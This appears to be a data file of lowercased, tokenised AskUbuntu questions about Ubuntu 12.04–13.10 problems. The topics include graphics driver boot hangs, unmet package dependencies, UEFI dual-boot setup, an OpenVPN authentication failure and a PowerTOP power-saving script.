391737	ubuntu 12.04 lts hanging on startup `` checking battery state '' after installing ati graphics card drivers	i just had a friend of mine set up ubuntu 12.04 lts on my machine , and put in 2 ati 7950 gpu 's . i entered the commands on this site for installing the video card drivers http : //www.btcpedia.com/install-ati-amd-drivers-ubuntu-linux/ the relevant commands are , in order , sudo apt-get install fglrx-updates fglrx-amdcccle-updates fglrx-updates-dev and then sudo aticonfig -- lsa sudo aticonfig -- adapter=all -- initial i then restarted the computer , and now it 's hanging on the `` check battery state '' line of the bootup . i saw there were many other posts similar to this on the forum , but i thought my problem was a little different because everything had worked previous to me putting in these commands . i 'm not 100 % sure what they did , so if anyone could give me some understanding of their purpose i could go out and find what they might have changed . a fix would be preferred though .
391738	getting an error while installing calculator lens	this is the error i get every time i try installing calculator lens yash @ yash-desktop : ~ $ sudo add-apt-repository ppa : scopes-packagers/ppa [ sudo ] password for yash : sorry , try again . [ sudo ] password for yash : traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 128 , in < module > ppa_info = get_ppa_info_from_lp ( user , ppa_name ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 84 , in get_ppa_info_from_lp curl.perform ( ) pycurl.error : ( 35 , 'gnutls_handshake ( ) failed : a tls packet with unexpected length was received . ' ) yash @ yash-desktop : ~ $ how to resolve this ?
391740	disconnecting netextender vpn : no internet	i have had some problems with my internet connection . after installing sonicwall netextender and connection to my office vpn and disconnecting again i do not have internet access . i can ping 8.8.8.8 and other ip-adresses , so it actually just seems to be a dns problem , but when i connect to netextender vpn again ( this time i have to use ip-adress ) i can browse via vpn again ... i have tried to uninstall netextender but that does not solve the problem.. can you help me ?
391741	unmet dependencies : initramfs-tools [ xubuntu 12.04 ]	how would one resolve this unmet dependencies issue i 've encountered ? when running the following cmd : root @ ubuntu1204-cshr3 : ~ # apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : initramfs-tools : depends : initramfs-tools-bin ( < 0.99ubuntu13.1.1~ ) but 0.99ubuntu13.4 is installed e : unmet dependencies . try using -f. root @ ubuntu1204-cshr3 : ~ # apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : initramfs-tools the following packages will be upgraded : initramfs-tools 1 upgraded , 0 newly installed , 0 to remove and 115 not upgraded . 4 not fully installed or removed . need to get 0 b/49.2 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of initramfs-tools : initramfs-tools depends on initramfs-tools-bin ( < < 0.99ubuntu13.1.1~ ) ; however : version of initramfs-tools-bin on system is 0.99ubuntu13.4 . dpkg : error processing initramfs-tools ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of apparmor : apparmor depends on initramfs-tools ; however : package initramfs-tools is not configured yet . dpkg : error processing apparmor ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of udev : no apport report written because maxreports is reached already udev depends on initramfs-tools ( > = 0.92bubuntu63 ) ; however : package initramfs-tools is not configured yet . dpkg : error processing udev ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of network-manager : no apport report written because maxreports is reached already network-manager depends on udev ; however : package udev is not configured yet . dpkg : error processing network-manager ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : initramfs-tools apparmor udev network-manager e : sub-process /usr/bin/dpkg returned an error code ( 1 ) additional system details : root @ ubuntu1204-cshr3 : ~ # df -h filesystem size used avail use % mounted on /dev/mapper/ubuntu1204 -- cshr3-root 18g 2.7g 14g 16 % / udev 367m 12k 367m 1 % /dev tmpfs 150m 312k 150m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 375m 84k 375m 1 % /run/shm /dev/sda1 228m 70m 146m 33 % /boot root @ ubuntu1204-cshr3 : ~ # uname -r 3.2.0-40-generic root @ ubuntu1204-cshr3 : ~ # apt-get update [ source.list output edited due to < 10 reputation ] hit h-t-t-p //us_archive_ubuntu_com precise release_gpg hit h-t-t-p //us_archive_ubuntu_com precise-updates release_gpg hit h-t-t-p //us_archive_ubuntu_com precise-backports release_gpg hit h-t-t-p //us_archive_ubuntu_com precise release hit h-t-t-p //us_archive_ubuntu_com precise-updates release hit h-t-t-p //us_archive_ubuntu_com precise-backports release hit h-t-t-p //ppa_launchpad_net precise release_gpg hit h-t-t-p //us_archive_ubuntu_com precise/main sources hit h-t-t-p //us_archive_ubuntu_com precise/restricted sources hit h-t-t-p //us_archive_ubuntu_com precise/universe sources hit h-t-t-p //us_archive_ubuntu_com precise/multiverse sources hit h-t-t-p //us_archive_ubuntu_com precise/main i386 packages hit h-t-t-p //us_archive_ubuntu_com precise/restricted i386 packages hit h-t-t-p //us_archive_ubuntu_com precise/universe i386 packages hit h-t-t-p //us_archive_ubuntu_com precise/multiverse i386 packages hit h-t-t-p //us_archive_ubuntu_com precise/main translationindex hit h-t-t-p //us_archive_ubuntu_com precise/multiverse translationindex hit h-t-t-p //security_ubuntu_com precise-security release_gpg hit h-t-t-p //extras_ubuntu_com precise release_gpg hit h-t-t-p //us_archive_ubuntu_com precise/restricted translationindex hit h-t-t-p //us_archive_ubuntu_com precise/universe translationindex hit h-t-t-p //us_archive_ubuntu_com precise-updates/main sources hit h-t-t-p //us_archive_ubuntu_com precise-updates/restricted sources hit h-t-t-p //us_archive_ubuntu_com precise-updates/universe sources hit h-t-t-p //ppa_launchpad_net precise release hit h-t-t-p //us_archive_ubuntu_com precise-updates/multiverse sources hit h-t-t-p //us_archive_ubuntu_com precise-updates/main i386 packages hit h-t-t-p //us_archive_ubuntu_com precise-updates/restricted i386 packages hit h-t-t-p //us_archive_ubuntu_com precise-updates/universe i386 packages hit h-t-t-p //us_archive_ubuntu_com precise-updates/multiverse i386 packages hit h-t-t-p //extras_ubuntu_com precise release hit h-t-t-p //security_ubuntu_com precise-security release hit h-t-t-p //us_archive_ubuntu_com precise-updates/main translationindex hit h-t-t-p //us_archive_ubuntu_com precise-updates/multiverse translationindex hit h-t-t-p //us_archive_ubuntu_com precise-updates/restricted translationindex hit h-t-t-p //us_archive_ubuntu_com precise-updates/universe translationindex hit h-t-t-p //us_archive_ubuntu_com precise-backports/main sources hit h-t-t-p //us_archive_ubuntu_com precise-backports/restricted sources hit h-t-t-p //us_archive_ubuntu_com precise-backports/universe sources hit h-t-t-p //us_archive_ubuntu_com precise-backports/multiverse sources hit h-t-t-p //us_archive_ubuntu_com precise-backports/main i386 packages hit h-t-t-p //us_archive_ubuntu_com precise-backports/restricted i386 packages hit h-t-t-p //ppa_launchpad_net precise/main sources hit h-t-t-p //us_archive_ubuntu_com precise-backports/universe i386 packages hit h-t-t-p //us_archive_ubuntu_com precise-backports/multiverse i386 packages hit h-t-t-p //us_archive_ubuntu_com precise-backports/main translationindex hit h-t-t-p //us_archive_ubuntu_com precise-backports/multiverse translationindex hit h-t-t-p //us_archive_ubuntu_com precise-backports/restricted translationindex hit h-t-t-p //extras_ubuntu_com precise/main sources hit h-t-t-p //us_archive_ubuntu_com precise-backports/universe translationindex hit h-t-t-p //us_archive_ubuntu_com precise/main translation-en hit h-t-t-p //us_archive_ubuntu_com precise/multiverse translation-en hit h-t-t-p //us_archive_ubuntu_com precise/restricted translation-en hit h-t-t-p //us_archive_ubuntu_com precise/universe translation-en hit h-t-t-p //us_archive_ubuntu_com precise-updates/main translation-en hit h-t-t-p //us_archive_ubuntu_com precise-updates/multiverse translation-en hit h-t-t-p //us_archive_ubuntu_com precise-updates/restricted translation-en hit h-t-t-p //us_archive_ubuntu_com precise-updates/universe translation-en hit h-t-t-p //us_archive_ubuntu_com precise-backports/main translation-en hit h-t-t-p //security_ubuntu_com precise-security/main sources hit h-t-t-p //ppa_launchpad_net precise/main i386 packages ign h-t-t-p //ppa_launchpad_net precise/main translationindex hit h-t-t-p //us_archive_ubuntu_com precise-backports/multiverse translation-en hit h-t-t-p //us_archive_ubuntu_com precise-backports/restricted translation-en hit h-t-t-p //us_archive_ubuntu_com precise-backports/universe translation-en hit h-t-t-p //extras_ubuntu_com precise/main i386 packages ign h-t-t-p //extras_ubuntu_com precise/main translationindex hit h-t-t-p //security_ubuntu_com precise-security/restricted sources hit h-t-t-p //security_ubuntu_com precise-security/universe sources hit h-t-t-p //security_ubuntu_com precise-security/multiverse sources hit h-t-t-p //security_ubuntu_com precise-security/main i386 packages hit h-t-t-p //security_ubuntu_com precise-security/restricted i386 packages hit h-t-t-p //security_ubuntu_com precise-security/universe i386 packages hit h-t-t-p //security_ubuntu_com precise-security/multiverse i386 packages hit h-t-t-p //security_ubuntu_com precise-security/main translationindex hit h-t-t-p //security_ubuntu_com precise-security/multiverse translationindex hit h-t-t-p //security_ubuntu_com precise-security/restricted translationindex hit h-t-t-p //security_ubuntu_com precise-security/universe translationindex hit h-t-t-p //security_ubuntu_com precise-security/main translation-en hit h-t-t-p //security_ubuntu_com precise-security/multiverse translation-en hit h-t-t-p //security_ubuntu_com precise-security/restricted translation-en hit h-t-t-p //security_ubuntu_com precise-security/universe translation-en ign h-t-t-p //extras_ubuntu_com precise/main translation-en_us ign h-t-t-p //ppa_launchpad_net precise/main translation-en_us ign h-t-t-p //extras_ubuntu_com precise/main translation-en ign h-t-t-p //ppa_launchpad_net precise/main translation-en reading package lists ... done root @ ubuntu1204-cshr3 : ~ # sudo apt-get remove initramfs-tools-bin & & sudo apt-get install initramfs-tools reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : initramfs-tools : depends : initramfs-tools-bin ( > = 0.99ubuntu13.1 ) but it is not going to be installed depends : initramfs-tools-bin ( < 0.99ubuntu13.1.1~ ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
391744	partition for dual boot uefi for windows and ubuntu	what should be the scheme partition table for two os . windows 8 and ubuntu in uefi mode . when i installed windows 8 i have three partition : 1 - msr 2 - recovery 3 - efi boot i need to create that one efi when install ubuntu such as two os . as result i had two efi boot partition ? ps : how say russian : sorri for mu inglish .
391746	how to hide or remove the bar which is top of the terminal ?	i always press alth when i am using vim . but the terminal have a help button at the top blocking me use alth when using vim . i want to hide or remove that bar . any ideas ?
391749	zte mf680 modem network disconnected	i 've recently reinstalled 12.04 . after the installation my mobile broadband modem ca n't keep the connection . it used to work with no problems at all . the network manager does see the modem , and i can use the network manager for all settings . first it says that the modem is recognized by the network , but direct after it disconnects and says that `` modem network disconnected '' . i have set the pin code for the usb-modem , restarted the netbook , without effect.i 've even re-installed the network manager . my modem is a zte mf680 . can anyone help me ?
391752	need to install eclipse jee but have a previous version already installed	i installed eclipse from the `` ubuntu software center '' and is up and running . but it was the the j2ee version ; i am trying to run tomcat from within eclipse and need the jee version . i have downloaded eclipse-jee-kepler-sr1-linux-gtk.tar.gz and need to install it in the directory that the se version was installed in . i have tried to uninstall it but ubuntu does not think that it is installed . david @ ubuntu-parker : ~ $ sudo apt-get autoremove eclipse [ sudo ] password for david : reading package lists ... done building dependency tree reading state information ... done package eclipse is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . any suggestions ? i have untarred it but not sure where to place it . and not sure if just dropping it somewhere is a good idea .
391753	why ubuntu does n't turn on trim for ssd by default	why does n't ubuntu turn on discard mount option for ssd drives that support it ? or , alternatively , include a cron-job to run fstrim periodically ? the aim of this question is to understand the technical difficulties and the reasons behind that decision and not to discuss a bug or a feature request .
391755	fan stays on with hp pavilion elite hpe-140f desktop pc using ubantu 13.1	i have just installed ubantu 13.10 on my hp pavilion elite hpe-140f desktop pc . i use windows 7 , 64 bit . the issue i am having is a fan ( not sure which one , think it 's the graphic card fan ) is noisy and spins constantly . this was remedied in windows 7 by chosing the `` balanced '' power setting . i have attempted to play with the ubuntu power settings but they seem to be for laptops with batteries and not desktops . perhaps i have installed the wrong version of ubuntu , but i have not found this to be an issue . does anyone have any ideas on how i could replicate the `` balanced '' power setting from windows 7 with ubuntu 13.10 ?
391760	ca n't load gdm or gnome	i 've been using ubuntu gnome 13.10 for about 2 weeks without issue , but today , after restarting my pc , it got stuck on the gnome splash screen . i managed to load my login screen by switching to lightdm , but when i login to gnome i 'm greeted by a wallpaperless , ui-less screen , and cinnamon launches a glitchy/messy fallback mode . i can still boot into xubuntu just fine , but i 'm unable to load compton or any other graphical effects . in xubuntu , video playback works flawlessly on youtube and in vlc , but smplayer fails to load . trying to launch steam gives the error , `` opengl glx extension not supported by display . '' i 've been looking around for a couple hours now , and i 'm unable to find any solution to my specific problem . the last thing i did before this issue occurred was install the pcsx emulator and add the pcsx2 ppa , but i do n't see how that could 've caused this whole mess . one additional bit of information is that i also have an elementaryos installation on my machine , which continues to run flawlessly . my pc is a haswell i5-4570 ( hd4600 graphics ) . i 'm currently using the latest mesa drivers from oibaf ppa . ( added a week ago )
391761	installed 13.10 , continuous internet problems	i installed 13.10 on my toshiba sattelite a-150 , and since , i have been having internet issues . i know that it 's the computer , because no other computer in the house has this problem . it wo n't load webpages , or maintain connections to servers , like google servers . if i want to load a webpage , i have to turn off my wifi and turn it back on . any questions ?
391764	asus x750j with graphic gf740m	i have asus x750j with graphic gf740m ubuntu 13.10 -- 64 additional drivers tool found this driver : http : //www.nvidia.com/object/linux-display-amd64-319.60-driver.html after switch on it and reboot , x server donât start . say me please what i do wrong ?
391765	how to programmatically apply powertop 's power saving suggestions on battery mode ?	i am using ubuntu 13.10 on an zenbook ux21e . in order to apply all suggestions programmatically , that powertop gives to save power , i created a script in : /etc/pm/power.d/zenbook containing : # powertop tunables case $ 1 in true ) # # vm writeback timeout echo 1500 > /proc/sys/vm/dirty_writeback_centisecs # # autosuspend for usb devices # # # usb2.0-crw ( generic ) echo auto > /sys/bus/usb/devices/1-1.7/power/level # # # bluetooth usb host controller ( atheros communications ) echo auto > /sys/bus/usb/devices/1-1.8/power/level # # runtime pm for pci devices # # # atheros communications inc. ar9485 wireless network adapter echo auto > /sys/bus/pci/devices/0000:02:00.0/power/control # # # fresco logic device 1009 # echo auto > /sys/bus/pci/devices/0000:03:00.0/power/control # currently this turns the usb3 port off , awaiting response # # # intel corporation 6 series/c200 series chipset family # # # 6 port sata ahci controller echo auto > /sys/bus/pci/devices/0000:00:1f.2/power/control # # # intel corporation 6 series/c200 series chipset family # # # usb enhanced host controller # 1 # echo auto > /sys/bus/pci/devices/0000:00:1d.0/power/control # causes machine to freeze on shutdown , should work with kernels 3.0.11 , 3.1.3 or newer # # # intel corporation 2nd generation core processor family # # # dram controller echo auto > /sys/bus/pci/devices/0000:00:00.0/power/control # # # intel corporation 6 series/c200 series chipset family # # # mei controller # 1 echo auto > /sys/bus/pci/devices/0000:00:16.0/power/control # # # intel corporation 6 series/c200 series chipset family # # # high definition audio controller echo auto > /sys/bus/pci/devices/0000:00:1b.0/power/control # # # intel corporation 6 series/c200 series chipset family # # # pci express root port 1 echo auto > /sys/bus/pci/devices/0000:00:1c.0/power/control # # # intel corporation 6 series/c200 series chipset family # # # pci express root port 2 echo auto > /sys/bus/pci/devices/0000:00:1c.1/power/control # # # intel corporation 6 series/c200 series chipset family # # # pci express root port 4 echo auto > /sys/bus/pci/devices/0000:00:1c.3/power/control # # # intel corporation 2nd generation core processor family # # # integrated graphics controller echo auto > /sys/bus/pci/devices/0000:00:02.0/power/control # # sata link power management echo min_power > /sys/class/scsi_host/host0/link_power_management_policy # 50 % screen brightness on battery echo 5 > /sys/bus/pci/devices/0000:00:02.0/backlight/acpi_video0/brightness # set powersave cpu governor for i in 0 1 2 3 ; do echo powersave > /sys/devices/system/cpu/cpu $ { i } /cpufreq/scaling_governor done ; ; false ) # 90 % screen brightness on ac echo 9 > /sys/bus/pci/devices/0000:00:02.0/backlight/acpi_video0/brightness # set ondemand cpu governor for i in 0 1 2 3 ; do echo ondemand > /sys/devices/system/cpu/cpu $ { i } /cpufreq/scaling_governor done ; ; esac exit 0 this used to work very well in ubuntu 12.04 up to 13.04 , but after i upgraded to 13.10 it does not work any more . how can i apply this power saving option programmatically in ubuntu 13.10 ? for what reason it does not work any more ?
391770	after updating kernel grub bad substitution , ubuntu 13.04 64bit	i ran a apt-get dist-upgrade on my nas ( ubuntu 13:04 64bit ) and it keeps giving an error on line 281 of /etc/grub.d/00_header `` bad substitution '' i have tried futzing around with the file but it does not solve the file . anyone any tips on what to do ? -- -- -- - output from apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 4 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? setting up linux-image-3.8.0-35-generic ( 3.8.0-35.50 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.8.0-35-generic /boot/vmlinuz-3.8.0-35-generic run-parts : executing /etc/kernel/postinst.d/dkms 3.8.0-35-generic /boot/vmlinuz-3.8.0-35-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.8.0-35-generic /boot/vmlinuz-3.8.0-35-generic update-initramfs : generating /boot/initrd.img-3.8.0-35-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.8.0-35-generic /boot/vmlinuz-3.8.0-35-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.8.0-35-generic /boot/vmlinuz-3.8.0-35-generic generating grub.cfg ... /etc/grub.d/00_header : 281 : /etc/grub.d/00_header : bad substitution run-parts : /etc/kernel/postinst.d/zz-update-grub exited with return code 2 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.8.0-35-generic.postinst line 1010. dpkg : error processing linux-image-3.8.0-35-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of linux-image-extra-3.8.0-35-generic : linux-image-extra-3.8.0-35-generic depends on linux-image-3.8.0-35-generic ; however : package linux-image-3.8.0-35-generic is not configured yet . dpkg : error processing linux-image-extra-3.8.0-35-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.8.0-35-generic ; however : package linux-image-3.8.0-35-generic is not configured yet . linux-image-generic depends on linux-image-extra-3.8.0-35-generic ; however : package linux-image-extra-3.8.0-35-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.8.0.35.53 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : linux-image-3.8.0-35-generic linux-image-extra-3.8.0-35-generic linux-image-generic linux-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 )
391771	install ubuntu 13.10 on msi gs 70 stealth - nvidia gtx 760 / intel hd 4000	i recently bought an msi gs 70 stealth notebook with windows 8 preinstalled . i updated it to windows 8.1 and reinstalled all the latest drivers and bios/firmware . i tried to install ubuntu gnome 13.10 after changing the boot mode from uefi to legacy ( which also turns secure boot off ) . first i tried to boot from the live cd without installing . it gave me the gnome logo with dots underneath but hung here and never changed . after looking around i found this site where apparently someone had got it working : http : //gs70-linux.blogspot.com/ i tried booting from the live cd by replacing the quiet splash options with nomodeset . this worked and ubuntu gnome booted just fine and wifi and everything else worked fine . at this point i continued to install ubuntu normally . it seemed to install correctly , when i rebooted i switched back to uefi mode and tried to boot normally . i was greeted with grub . there was an entry for ubuntu , but no windows . i tried booting into ubuntu and got only a blank screen . i tried restarting and editing the boot options at grub replacing quiet splash with nomodeset again , but this did n't work . at this point i used to live cd to boot back into ubuntu and installed and ran the boot-repair utility . during some of the commands it had me copy into the terminal i got some warnings back : source_dir does n't exist . please specify -- target or -- directory . grub-efi-amd64-signed depends on grub-efi-amd64 ; however , package grub-efi-amd64 is not configured yet . even though i got these warnings it appeared the utility finished running successfully . it gave me the following url : http : //paste.ubuntu.com/6584972 it told me to make sure that it boots from sda2/efi/ubuntu/shimx64.efi . after this i rebooted and switched back to uefi . after rebooting normally i got grub again , this time with entries for windows 8 and windows recovery . i was able to boot into windows 8 just fine . ubuntu still hangs on a blank screen and does n't load . if i hit the advanced options and try to select any of the ubuntu options it stops at loading initial ramdisk . trying to hit e and changing quiet splash to nomodeset does n't change anything . anyone have any advice about what i can try next .
391772	troubleshooting software to show / solve all ubuntu problems at once ?	this question is merely of general interest . i 'm a newbie to ubuntu and like it quite a lot . however , troubleshooting takes up quite a lot of my time , because i love software and install left right and center , and when i got a problem later on i can not figure out which one of the newly installed software caused it , or where to look for the problem . i had a problem earlier today where specifically downloads close right after i opened it with files / file manager , using nautilus . documents , pictures and the rest works fine though . installed two other file managers ( pcmanfm and thunar ) and downloads works fine with them . as a windows user i am using slimcleaner there , which is pure gold for checking on the health of windows , it 's basically a all-in-one command centre to see what is installed from software to toolbars , and much more , and helps a lot to identify problems on a computer . unfortunately slimcleaner is not available for linux . i am looking for a similar program for ubuntu . at the moment i do n't know where to look for 'dead files ' that is just taking up space , i do n't know what the health of my ubuntu is , i do n't know if a website hacked my browser and installed an add-on , i do n't know if there are any corrupt files on it , etc . so the software i 'm looking for must give me a nice overview of almost anything on ubuntu , if you understand what i mean . a fix-it-all type of software , like those registry-cleaners and defragmenting software you get in windows . i surfed askubuntu but could not find a similar thread or solution , and believe many new users would like to identify potential problems on their systems at one central place . for all that i know ubuntu itself may already have something like that built-in ? oh , and i do read every ubuntu manual and book that i can get hold of . : ) i 'm just a bit disappointed after seeing how many hours i spent looking for a solution to a problem , while software would have shown it to me in seconds , and probably fix it in a few more .
391777	deleted ubuntu partition	i have deleted my ubuntu partition from windows 7 and as the computer booted to ubuntu by default ( after a 10 second boot menu ) i can no longer start windows 7 . ( i get a grub rescue prompt ) . i would like to reinstall ubuntuâ and only deleted due to a password problem . i would appreciate any advice on how to reinstall ubuntu in a dual boot config . thanks alan
391778	dell inspiron mini 12 bootloader fails to install	my daughter gave me her dell 12 mini with a version 8 something of ubuntu . i first loaded version 13 but it ran really , really slowly . i just loaded 12.04.3 replacing version 13 but got this message . executing 'grub-install/dev/sda ' failed . then the install finished and i was told i would have to install the bootloader manually . how do i do this ? almost no linux experience is the mini 12 a lost cause ?
391779	postfix smtp-auth	on a vps with ubuntu 12.04 server , i have install and configure postfix . for the smtp-auth i used the mail-stack-delivery package ( previously packaged as dovecot-postfix ) . sudo apt-get install mail-stack-delivery after that in /etc/postfix/main.cf i have these two lines : smtpd_tls_cert_file = /etc/ssl/certs/server.crt smtpd_tls_key_file = /etc/ssl/private/server.key my question is these files server.crt and server.key are ok or i have to create others with the openssl ( a self-signed certificate ) .
391781	installed ubuntu 13.10 w/windows 8.1 , now no dual boot	installation looked ok . but when restarting i did n't get a dual boot page as i had gotten a couple years ago . this time my windows 8.1 booting file got screwed . i was able to repair it with dos commands i found somewhere ( bootrec /fix ... ) . after that i was able to boot into win again . but never saw that booting page i used to get before so i could choose which os to go with . i 've been reading about this , my next step will be to go into my bios/booting settings page and see if uefi is enabled . hopefully i 'll see ubuntu there among the choices . something else is , all through the ubuntu installation i do n't recall it asking me where i wanted to install it . i hope enabling uefi will be enough . am i expected to mess around with any grub files ? update : now i know my motherboard is not current enough to have uefi : ( any ideas/tips/suggestions ? thanks guys ! jdl
391782	ca n't make my geforce gtx work and i 'm going crazy	with the default open source driver it 's slow as hell . so i tried the latest one and installed according to the steps from http : //news.softpedia.com/news/how-to-install-the-latest-nvidia-331-20-drivers-in-ubuntu-13-10-399182.shtml it was working fast , but i had to restart few times until i get something different from black screen upon booting and also recovering from suspend was also going to the black screen . so i purged it and installed the nvidia-current from the app centre , again it has problems booting and the graphics are moved to the left couple inches . so what should i install to have my nvidia work properly ? : (
391783	tried updating from 11.10 to 12.04 , gets stuck at boot screen	the update finished , upon restart i get stuck at this : and nothing afterwards . before i attempt a complete reinstall , are there any other steps i can take ? if i do end up reinstalling , what is the best way to back up my files from the windows side ? as of right now , i can not view them because windows sees the folder as a protected recovery partition .
391786	boot hangs in a live usb over a toshiba qosimo x75	i just purchased a toshiba qosimo x75-a7298 laptop and want to install ubuntu on it ( do n't particularly care which version ) . i tried both v12.04lts and 13.10 . the boot process hangs almost immediately after i choose to `` try ubuntu without installing '' . i turned off `` secure boot '' and changed the boot mode from `` uefi '' to `` csm '' with no luck .
391787	xfce-volumed messes up my shortcuts	i recently switched my to a new motherboard and processor which seemed to have messed up my volume shortcuts a bit . the notifications were displaying but the volume would not change after further investigation , i have discovered that something wtih xfce4-volumed has been messing me up . in the beginning it was the volume would max out at 75 until i went into sound preferences , so i reinstalled xfce4-notifyd and xfce4-volumed now the volume works fine . all the alsa shortcuts work fine in terminal and with anything but my volume keys on my keyboard ( logitech k800 ) when volumed is installed , when it 's not installed i can use the volume keys as well but the notifications will no longer show like i want . it 's a very weird problem for me and for someone who 's been using linux for the past 7 years it 's probably not very common but i 'm hoping someone can help me . right now simply removing volumed will let me use my volume keys and they will work but with no notifications . if i add volumed it shows notifications but they are n't synced at all to the actual volume and do absolutely nothing , also nothing has to be behind those keys for them to work in openbox , i can remove all my lines of code that tell these keys to do something and they will still display notifications with volumed . i 'm running lubuntu 12.10 , with openbox and alsa . if anyone can help me it would be greatly appreciated .
391790	ca n't install php5-curl , getting `` 404 not found '' errors	my problem when trying to install php5-curl on my virtual box linux server . i did ifconfig eth1 up : err http : //nl.archive.ubuntu.com/ubuntu/ precise-updates/main php5-curl amd64 5.3.10-1ubuntu3.8 404 not found err http : //security.ubuntu.com/ubuntu/ precise-security/main php5-curl amd64 5.3.10-1ubuntu3.8 404 not found { ip : 91.189.92.201 80 ]
391791	unable to launch pidgin	using pidgin from the command-line or launching it via the indicator is not working . i 've tried reinstalling it , but the issue persists : $ pidgin the program 'pidgin ' is currently not installed . you can install it by typing : sudo apt-get install pidgin $ sudo apt-get install pidgin reading package lists ... done building dependency tree reading state information ... done pidgin is already the newest version . the following package was automatically installed and is no longer required : gstreamer0.10-ffmpeg use 'apt-get autoremove ' to remove it . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . how can this be fixed ? update : removing pidgin-sipe did not help remove the diversion ( see answers below ) . doing sudo dpkg-divert -- remove /usr/bin/pidgin , and then reinstalling the pidgin package fixed it .
391792	invalid vpn secrets ! no server certificate verification method enabled	i 'm trying to set up a vpn ( from vypervpn ) with openvpn and keep getting an invalid vpn secrets error . i 've been searching for a solution for a day and a half mow to no avail so i though i would come ask the pros . i tried restarting network manager as well as the whole system . also i tried ticking/unticking the all users option in open vpn . both were said to have helped others with this problem . heres the syslog : dec 16 14:33:13 penguine-pc networkmanager [ 920 ] : < info > starting vpn service 'openvpn ' ... dec 16 14:33:13 penguine-pc networkmanager [ 920 ] : < info > vpn service 'openvpn ' started ( org.freedesktop.networkmanager.openvpn ) , pid 3111 dec 16 14:33:13 penguine-pc networkmanager [ 920 ] : < info > vpn service 'openvpn ' appeared ; activating connections dec 16 14:33:13 penguine-pc networkmanager [ 920 ] : < info > vpn plugin state changed : init ( 1 ) dec 16 14:33:14 penguine-pc networkmanager [ 920 ] : < info > vpn plugin state changed : starting ( 3 ) dec 16 14:33:14 penguine-pc networkmanager [ 920 ] : < info > vpn connection 'vyprvpn openvpn ' ( connect ) reply received . dec 16 14:33:14 penguine-pc nm-openvpn [ 3117 ] : openvpn 2.2.1 x86_64-linux-gnu [ ssl ] [ lzo2 ] [ epoll ] [ pkcs11 ] [ eurephia ] [ mh ] [ pf_inet6 ] [ ipv6 payload 20110424-2 ( 2.2rc2 ) ] built on feb 27 2013 dec 16 14:33:14 penguine-pc nm-openvpn [ 3117 ] : warning : no server certificate verification method has been enabled . see http : //openvpn.net/howto.html # mitm for more info . dec 16 14:33:14 penguine-pc nm-openvpn [ 3117 ] : note : the current -- script-security setting may allow this configuration to call user-defined scripts dec 16 14:33:14 penguine-pc nm-openvpn [ 3117 ] : lzo compression initialized dec 16 14:33:14 penguine-pc nm-openvpn [ 3117 ] : udpv4 link local : [ undef ] dec 16 14:33:14 penguine-pc nm-openvpn [ 3117 ] : udpv4 link remote : [ af_inet ] 216.168.3.151:1194 dec 16 14:33:17 penguine-pc nm-openvpn [ 3117 ] : [ us2.vpn.giganews.com ] peer connection initiated with [ af_inet ] 216.168.3.151:1194 dec 16 14:33:20 penguine-pc nm-openvpn [ 3117 ] : auth : received auth_failed control message dec 16 14:33:20 penguine-pc nm-openvpn [ 3117 ] : sigterm [ soft , auth-failure ] received , process exiting dec 16 14:33:20 penguine-pc networkmanager [ 920 ] : < warn > vpn plugin failed : 0 dec 16 14:33:20 penguine-pc networkmanager [ 920 ] : < info > vpn plugin state changed : stopped ( 6 ) dec 16 14:33:20 penguine-pc networkmanager [ 920 ] : < info > vpn plugin state change reason : 10 dec 16 14:33:20 penguine-pc networkmanager [ 920 ] : < warn > error disconnecting vpn : could not process the request because no vpn connection was active . dec 16 14:33:20 penguine-pc networkmanager [ 920 ] : < info > policy set 'ervilla_ext ' ( eth1 ) as default for ipv4 routing and dns . dec 16 14:33:25 penguine-pc networkmanager [ 920 ] : < info > vpn service 'openvpn ' disappeared after reviewing the logs it would appear the problem is `` no server certificate verification method has been enabled . '' to quote directly from the log . to be honest though i dont know what to make of that , hopefully someone with more know how can inform me .
